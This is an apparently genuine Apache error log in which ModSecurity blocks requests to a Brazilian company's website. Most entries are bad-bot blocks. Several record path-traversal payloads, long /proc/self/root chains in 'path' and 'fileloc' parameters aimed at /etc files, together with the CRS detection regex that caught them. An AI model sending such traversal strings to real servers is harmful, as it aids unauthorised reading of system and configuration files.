[Mon Mar 16 14:53:58.268191 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.243.203:49160] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDtnjZBu2q05ozVU9lxwAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:54:01.271023 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.243.203:49176] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDt6TCbgAP5jq5Teg4HwAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:54:10.179379 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.243.203:48164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDwlajLEzk2WiQ-10djgAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:54:10.279175 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.241.46:55704] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDwrysWC90G-1nBrBQNwAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:54:15.583242 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.243.203:36356] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDx3jZBu2q05ozVU9lzwAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:55:22.590880 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.244.31:59138] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhECqQpVkWug9HeOt9B7QAAA1E"]
[Mon Mar 16 14:57:19.251535 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.228.16:33130] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhEf3jZBu2q05ozVU9l-QAAAVM"]
[Mon Mar 16 15:01:11.811161 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.244.31:55322] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhFZ6TCbgAP5jq5Teg43QAAAsQ"]
[Mon Mar 16 15:02:40.802709 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.228.16:58540] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhFwI6lpbStxTqkSkt4FgAAAk8"]
[Mon Mar 16 15:06:33.471119 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.244.31:59296] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhGqVajLEzk2WiQ-10eNgAAApM"]
[Mon Mar 16 15:07:58.651303 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.228.16:60282] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhG_njZBu2q05ozVU9mhwAAAU0"]
[Mon Mar 16 15:11:34.185352 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.244.31:45372] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhH1njZBu2q05ozVU9mswAAAUs"]
[Mon Mar 16 15:16:57.776390 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.244.31:60134] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhJGLABkC4fWIHEf8H8lwAAAEQ"]
[Mon Mar 16 15:23:29.640187 2026] [:error] [pid 29507:tid 140411616036608] [client 74.7.228.16:36904] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhKoUr9dMAiw-8KANNSsQAAAQ8"]
[Mon Mar 16 15:27:25.378407 2026] [:error] [pid 29507:tid 140411590858496] [client 74.7.244.31:37938] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhLjUr9dMAiw-8KANNS3QAAARI"]
[Mon Mar 16 15:27:30.606337 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.228.16:52172] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhLklajLEzk2WiQ-10fugAAAos"]
[Mon Mar 16 15:32:26.768956 2026] [:error] [pid 14895:tid 140411683178240] [client 74.7.244.31:39518] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhMulajLEzk2WiQ-10f9AAAAoc"]
[Mon Mar 16 15:34:04.181888 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.228.16:50000] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhNHKQpVkWug9HeOt9DwwAAA1g"]
[Mon Mar 16 15:37:48.083037 2026] [:error] [pid 15061:tid 140411641214720] [client 74.7.244.31:50930] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhN_KTCbgAP5jq5Teg6fwAAAsw"]
[Mon Mar 16 15:39:25.764700 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.228.16:36384] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhOXf9ocpUE4ed4uDz-GgAAAg8"]
[Mon Mar 16 15:43:01.656896 2026] [:error] [pid 15061:tid 140411699963648] [client 74.7.244.31:44474] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhPNaTCbgAP5jq5Teg7BgAAAsU"]
[Mon Mar 16 15:44:00.158872 2026] [access_compat:error] [pid 15568:tid 140411574073088] [client 141.98.11.23:59724] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/upgrade.php, referer: www.google.com
[Mon Mar 16 15:44:08.111255 2026] [access_compat:error] [pid 29802:tid 140411548894976] [client 141.98.11.23:60875] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/theme-install.php, referer: www.google.com
[Mon Mar 16 15:44:34.318096 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.228.16:59348] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhPklajLEzk2WiQ-10gkAAAApY"]
[Mon Mar 16 15:49:39.846800 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.228.16:37076] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhQw9SswJuvopo3lOhtnAAAAII"]
[Mon Mar 16 15:50:40.292285 2026] [access_compat:error] [pid 15061:tid 140411691570944] [client 200.107.116.178:32389] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 15:52:17.365020 2026] [access_compat:error] [pid 14895:tid 140411674785536] [client 186.247.17.110:60835] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 15:52:56.220430 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.228.16:41462] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhRiNSswJuvopo3lOht9wAAAJc"]
[Mon Mar 16 15:53:39.842716 2026] [:error] [pid 29802:tid 140411624429312] [client 74.7.244.31:51048] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhRs8_BxrYCr4hPDw_6HQAAAc4"]
[Mon Mar 16 15:58:59.995931 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.244.31:55994] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhS88_BxrYCr4hPDw_6cgAAAdA"]
[Mon Mar 16 16:00:40.319602 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.228.16:56456] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhTWKTCbgAP5jq5Teg8mwAAAtE"]
[Mon Mar 16 16:04:09.557604 2026] [:error] [pid 29802:tid 140411699963648] [client 74.7.244.31:33932] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhUKc_BxrYCr4hPDw_7DAAAAcU"]
[Mon Mar 16 16:05:51.925655 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.228.16:47800] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhUj1ajLEzk2WiQ-10i5wAAApc"]
[Mon Mar 16 16:09:21.308937 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.244.31:49816] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhVYaQpVkWug9HeOt9GtAAAA0Q"]
[Mon Mar 16 16:11:15.052097 2026] [:error] [pid 14895:tid 140411716749056] [client 74.7.241.46:47222] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhV01ajLEzk2WiQ-10jJgAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:11:16.648186 2026] [:error] [pid 29507:tid 140411691570944] [client 74.7.228.16:34932] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhV1Er9dMAiw-8KANNW3QAAAQY"]
[Mon Mar 16 16:11:36.231077 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.243.203:46312] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhV6KTCbgAP5jq5Teg9GwAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:12:14.571220 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:52868] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhWDv9ocpUE4ed4uDwCdAAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:13:11.091987 2026] [access_compat:error] [pid 15568:tid 140411716749056] [client 45.94.31.197:33836] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 16:14:37.310943 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.244.31:50958] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhWnaQpVkWug9HeOt9G6gAAA1g"]
[Mon Mar 16 16:16:59.994431 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.241.46:50352] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXK1ajLEzk2WiQ-10jVwAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:17:05.873785 2026] [:error] [pid 14895:tid 140411716749056] [client 74.7.241.46:50354] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhXMVajLEzk2WiQ-10jWQAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
